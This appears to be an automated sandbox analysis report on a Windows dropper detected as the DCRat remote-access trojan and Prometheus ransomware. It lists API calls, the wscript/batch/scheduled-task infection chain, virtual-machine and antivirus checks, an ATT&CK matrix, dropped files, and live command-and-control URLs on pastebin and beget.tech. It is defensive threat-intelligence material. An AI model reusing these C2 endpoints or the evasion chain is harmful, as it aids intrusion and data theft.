            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0088B8E0
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089AAA8 FindFirstFileExA,0_2_0089AAA8
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088DD72 VirtualQuery,GetSystemInfo,0_2_0088DD72
            Source: C:\brokermonitordhcp\portruntime.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599454Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599329Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599204Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 599079Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 598954Jump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeThread delayed: delay time: 922337203685477
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\userJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: QIKiV83Pkl.exe, 00000000.00000003.1335317121.00000000034B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000002.00000003.1440152295.00000000035E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1608191159.000000001BCB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
            Source: w32tm.exe, 00000021.00000002.1545110842.0000029B28F79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: QIKiV83Pkl.exe, 00000000.00000003.1335317121.00000000034B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeAPI call chain: ExitProcess graph end nodegraph_0-23701
            Source: C:\brokermonitordhcp\portruntime.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089866F
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089753D mov eax, dword ptr fs:[00000030h]0_2_0089753D
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089B710 GetProcessHeap,0_2_0089B710
            Source: C:\brokermonitordhcp\portruntime.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess token adjusted: DebugJump to behavior
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088F063 SetUnhandledExceptionFilter,0_2_0088F063
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0088F22B
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0089866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089866F
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088EF05
            Source: C:\brokermonitordhcp\portruntime.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe"Jump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088ED5B cpuid 0_2_0088ED5B
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0088A63C
            Source: C:\brokermonitordhcp\portruntime.exeQueries volume information: C:\brokermonitordhcp\portruntime.exe VolumeInformationJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\brokermonitordhcp\portruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeQueries volume information: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformationJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeQueries volume information: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformationJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exeQueries volume information: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformation
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0088D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0088D5D4
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exeCode function: 0_2_0087ACF5 GetVersionExW,0_2_0087ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1608191159.000000001BCB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1564725393.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1515032727.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1476467442.0000000012CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: portruntime.exe PID: 3212, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 6572, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1564725393.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.1515032727.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1476467442.0000000012CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: portruntime.exe PID: 3212, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 6572, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts241
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		233
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		11
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory261
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		151
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS151
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials3
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Software Packing            		DCSync57
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483416 Sample: QIKiV83Pkl.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 62 pastebin.com 2->62 64 romangw5.beget.tech 2->64 66 bg.microsoft.map.fastly.net 2->66 68 Found malware configuration 2->68 70 Antivirus detection for dropped file 2->70 72 Antivirus / Scanner detection for submitted sample 2->72 76 10 other signatures 2->76 11 QIKiV83Pkl.exe 3 6 2->11         started        14 HuzhgkcqwYiFfxvhdfMUs.exe 2 2->14         started        17 HuzhgkcqwYiFfxvhdfMUs.exe 14 3 2->17         started        signatures3 74 Connects to a pastebin service (likely for C&C) 62->74 process4 dnsIp5 54 C:\brokermonitordhcp\portruntime.exe, PE32 11->54 dropped 56 C:\...56KrhHlHeQ28n8tUMpitEGWra.vbe, data 11->56 dropped 20 wscript.exe 1 11->20         started        90 Multi AV Scanner detection for dropped file 14->90 92 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->92 58 pastebin.com 172.67.19.24, 443, 49704 CLOUDFLARENETUS United States 17->58 60 romangw5.beget.tech 5.101.153.57, 49706, 80 BEGET-ASRU Russian Federation 17->60 file6 signatures7 process8 signatures9 78 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->78 23 cmd.exe 1 20->23         started        process10 process11 25 portruntime.exe 3 20 23->25         started        29 conhost.exe 23->29         started        file12 46 C:\...\HuzhgkcqwYiFfxvhdfMUs.exe, PE32 25->46 dropped 48 C:\Windows\...\HuzhgkcqwYiFfxvhdfMUs.exe, PE32 25->48 dropped 50 C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe, PE32 25->50 dropped 52 5 other malicious files 25->52 dropped 82 Antivirus detection for dropped file 25->82 84 Multi AV Scanner detection for dropped file 25->84 86 Machine Learning detection for dropped file 25->86 88 4 other signatures 25->88 31 cmd.exe 25->31         started        33 schtasks.exe 25->33         started        35 schtasks.exe 25->35         started        37 19 other processes 25->37 signatures13 process14 process15 39 HuzhgkcqwYiFfxvhdfMUs.exe 31->39         started        42 conhost.exe 31->42         started        44 w32tm.exe 31->44         started        signatures16 80 Multi AV Scanner detection for dropped file 39->80

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            QIKiV83Pkl.exe71%ReversingLabsWin32.Trojan.Vigorf
            QIKiV83Pkl.exe59%VirustotalBrowse
            QIKiV83Pkl.exe100%AviraVBS/Runner.VPG
            QIKiV83Pkl.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat100%AviraBAT/Delbat.C
            C:\brokermonitordhcp\portruntime.exe100%AviraHEUR/AGEN.1323984
            C:\Users\Default\conhost.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%AviraHEUR/AGEN.1323984
            C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe100%AviraVBS/Runner.VPG
            C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe100%Joe Sandbox ML
            C:\brokermonitordhcp\portruntime.exe100%Joe Sandbox ML
            C:\Users\Default\conhost.exe100%Joe Sandbox ML
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%Joe Sandbox ML
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%Joe Sandbox ML
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%Joe Sandbox ML
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%Joe Sandbox ML
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe100%Joe Sandbox ML
            C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe68%VirustotalBrowse
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe68%VirustotalBrowse
            C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe68%VirustotalBrowse
            C:\Users\Default\conhost.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Default\conhost.exe68%VirustotalBrowse
            C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe68%VirustotalBrowse
            C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe68%VirustotalBrowse
            C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe68%VirustotalBrowse
            C:\brokermonitordhcp\portruntime.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\brokermonitordhcp\portruntime.exe68%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            bg.microsoft.map.fastly.net0%VirustotalBrowse
            romangw5.beget.tech1%VirustotalBrowse
            pastebin.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://romangw5.beget.tech/0%Avira URL Cloudsafe
            http://romangw5.beget.tech0%Avira URL Cloudsafe
            https://pastebin.com/raw/i8wetBiv0%Avira URL Cloudsafe
            http://pastebin.com0%Avira URL Cloudsafe
            http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f0%Avira URL Cloudsafe
            http://romangw5.beget.tech/1%VirustotalBrowse
            http://romangw5.beget.tech1%VirustotalBrowse
            https://pastebin.com0%Avira URL Cloudsafe
            http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD60%Avira URL Cloudsafe
            http://pastebin.com0%VirustotalBrowse
            https://pastebin.com/raw/i8wetBiv2%VirustotalBrowse
            https://pastebin.com0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.214.172
            		truefalseunknown
            romangw5.beget.tech
            		5.101.153.57
            		truefalseunknown
            pastebin.com
            		172.67.19.24
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://pastebin.com/raw/i8wetBivtrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6false
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://romangw5.beget.tech/HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://romangw5.beget.techHuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameportruntime.exe, 00000005.00000002.1474905892.000000000300D000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://pastebin.comHuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://romangw5.beget.tech/L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0fHuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002EC3000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://pastebin.comHuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1515032727.0000000002E38000.00000004.00000800.00020000.00000000.sdmptrue
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            172.67.19.24
            		pastebin.comUnited States
            		13335CLOUDFLARENETUStrue
            5.101.153.57
            		romangw5.beget.techRussian Federation
            		198610BEGET-ASRUfalse

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1483416
            Start date and time:2024-07-27 11:36:09 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 48s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:42
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:QIKiV83Pkl.exe
            renamed because original name is a hash value
            Original Sample Name:2c00ebc767b339c3baf6bcf3086edf51.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@39/22@2/2
            EGA Information:
            • Successful, ratio: 20%
            HCA Information:
            • Successful, ratio: 59%
            • Number of executed functions: 397
            • Number of non-executed functions: 96
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, winlogon.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 40.68.123.157, 20.242.39.171, 2.19.126.137, 2.19.126.163, 13.85.23.206
            • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
